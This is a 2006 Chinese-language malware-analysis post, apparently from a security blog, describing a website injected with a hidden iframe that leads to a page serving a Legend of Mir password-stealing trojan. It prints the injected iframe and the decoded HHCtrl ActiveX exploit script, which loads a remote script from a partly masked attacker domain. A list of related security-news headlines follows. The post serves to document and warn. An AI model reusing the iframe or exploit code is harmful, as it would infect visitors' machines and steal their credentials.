[2006-04-12]一个下载传奇盗号木马的网站(第2版)

简介: [2006-04-12]一个下载传奇盗号木马的网站(第2版)

网页:

hxxp://www.****44mtv.com/vod/index1.htm

中被加入

 

<iframe src="hxxp://www.****26cd.com/test/index.htm" height="0" width="0" MARGINWIDTH="0" MARGINHEIGHT="0" HSPACE="0" VSPACE="0" FRAMEBORDER="0" SCROLLING="no"></iframe>

 

 

hxxp://www.****26cd.com/test/index.htm部分代码使用了escape()编码,unescape()后的内容为:

 

 

<SCRIPT>var Words="<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT><SCRIPT language=VScript src="bbs003302.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'></OBJECT><OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.****26cd.com/test/bbs003302.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT></BODY></HTML>
";document.write(unescape(Words))</SCRIPT>

 

 

下载2个文件:

 

1、bbs003302.css

Kaspersky报为Trojan-PSW.Win32.Lmir.atj

2、bbs003302.gif

瑞星报为Exploit.HHCtrl.Jiaozhu

Kaspersky报为exploit.VBS.Phel.m


相关文章
|
7月前
|
云安全 安全 网络协议
安全研究所 | 伪装搜狗输入法的木马分析
近年来,黑灰产业的犯罪团伙数量急剧上升,特别是在与办公软件相关领域。这些团伙主要针对国内企业用户,通过伪装成合法的办公软件进行精心设计的诈骗和诱导行为,其主要目的是欺骗企业员工下载并激活木马病毒,以此来窃取公司资金或获取企业敏感文件。
|
3月前
|
安全 JavaScript 前端开发
小心冒充瑞星专家的病毒ravexp.exe
小心冒充瑞星专家的病毒ravexp.exe
|
SQL 安全 PHP
关于网上找黑客 被骗
关于网上找黑客 被骗
|
Web App开发 安全
卡巴斯基提醒网民注意:压缩文件也能变木马
普通计算机用户一般都通过所下载文件的图标来判断文件类型,但这一方法并非绝对安全。很多病毒会修改自身的显示图标,伪装成正常文件,诱使用户点击运行。卡巴斯基实验室近期就检测到一种名为“首页修改大师”的木马(Trojan-Dropper.Win32.StartPage.cr),这种木马采用WINRAR压缩工具的图标迷惑用户,其实本身是一个exe可执行文件,一旦计算机用户不小心运行了该文件,系统就会被感染。
1126 0
|
安全
悲剧:金山毒霸官网被黑客攻破
6月2日下午两点左右,本网接读者反应,发现金山毒霸官网博客被黑客劫持,网页内容已面目全非。 在输入金山毒霸官网地址http://blog.duba.net/,已没有金山毒霸关于其产品的介绍及下载,变成了封署名为熊猫烧香致铁军的一封信,信中除了一些莫名其妙,令人费解的怪话外,附加了伟哥产品的图片,实为黑客的恶作剧。
1024 0
|
安全
端午小长假谨防挂马网站 病毒模仿杀软骗取钱财
随着端午小长假的临近,上网人数增加,这段时间的挂马网站和木马病毒都有肆虐的趋势。5月25日,瑞星“云安全”系统就从截获的挂马网站中,发现了一个冒充杀毒软件、企图骗取钱财的广告软件病毒,并命名为“WINPC 广告病毒(Adware.Win32.Agent.Dbj)”。
1101 0
|
安全
怀旧小虎队 谨防挂马网站和极虎病毒
“把你的心,我的心串一串,串一株幸运草,串一个同心圆,让所有期待未来的呼唤,趁青春做个伴……”小虎队唱着歌曲亮相春晚后,掀起了一股怀旧风——“80后”都是听着小虎队的歌长大的。 小虎队再度火了,搜索关键词“小虎队”的网民呈现爆炸式增长(图1),关键词“小虎队”蕴藏的“价值”自然逃不过挂马集团贪婪的眼睛,他们明白,如果利用关键词“小虎队”进行挂马,会有数以百万计、千万计的网民中招。
1124 0
|
云安全 安全
瑞星杀毒网络版2010发布 称可查杀99.9%木马
4月15日,亚洲最大的信息安全厂商瑞星公司召开隆重发布会,正式发布2010年企业级旗舰产品——“瑞星杀毒软件网络版2010”系列。该系列产品包括六种版本,产品适用范围覆盖了小型企业、大中型企业、金融机构以及政府单位等所有企业级用户。
1144 0
|
云安全 安全
瑞星首推“恶意网站监测网” 每天500万网民访问挂马网站
1月8日,瑞星宣布推出“恶意网站监测网(http://mwm.rising.com.cn/)”,这是国内首个专门针对挂马网站、钓鱼网站等互联网威胁的实时监测系统,所有政府机构、企业和个人用户都可以免费浏览该网站,全面、清晰地了解国内网站被黑客“挂马”的情况。
1076 0
|
Web App开发 安全
黑客挂马紧盯娃娃 儿童节育儿教育网站被挂马
据瑞星“云安全”系统监测,5月31日,“39健康育儿网”、“好得网教育频道”、“湖南教育资源门户网-湘教在线”等大型教育网站被黑客挂马,用户浏览这些网站后,会感染木马病毒:Backdoor.Win32.Gpigeon2007.cym(灰鸽子后门病毒),可能会被黑客远程控制。
1019 0

热门文章

最新文章